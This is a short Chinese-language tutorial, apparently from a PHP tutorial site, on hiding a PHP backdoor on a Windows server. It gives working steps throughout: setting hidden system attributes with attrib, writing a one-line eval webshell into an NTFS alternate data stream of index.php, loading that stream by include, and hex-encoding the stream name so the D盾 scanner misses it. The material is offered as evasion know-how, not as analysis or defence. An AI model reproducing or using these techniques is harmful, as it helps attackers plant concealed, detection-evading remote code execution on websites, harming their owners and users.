php將後門隱藏的方法:先建立系統隱藏文件,並建立ADS隱藏文件;然後透過包含文件的方式來使用jpd;最後將【index.php:shell.jpg】hex編碼即可。
php將後門隱藏的方法:
一. attrib s h
建立系統隱藏檔案。
attrib s a r h
/ attrib s h
檔名
二. 利用ADS隱藏檔案
NTFS交換資料流(Alternate Data Streams,簡稱ADS)是NTFS磁碟格式的特性,在NTFS檔案系統下,每個檔案都可以存在多個資料流。通俗的理解,就是其它文件可以「寄宿」在某個文件身上,而在資源管理器中卻只能看到宿主文件,找不到寄宿文件。利用ADS資料流,我們可以做很多有趣的事。 (抄的)1.先建立ADS隱藏檔案
在指令行,echo一個資料流進去,例如index檔是正常文件。echo ^<?php @eval($_REQUEST[1]);?^> > index.php:shell.jpg
dir/r 指令來查看
2. 檔案包含
我們產生了index.php:shell .jpg,可以透過包含檔案的方式來使用。<?php include(‘index.php:shell.jpg‘)?>
3. 免殺
隱藏了也不行兄dei,D盾一掃瞬間爆炸。 把index.php:shell.jpg hex編碼<?php $a="696E6465782E7068703A7368656C6C2E6A7067"; // index.php:shell.jpg hex编码 $b="a"; include(PACK(‘H*‘,$$b)) ?>
#相關學習推薦:#
以上是php如何將後門隱藏?的詳細內容。更多資訊請關注PHP中文網其他相關文章!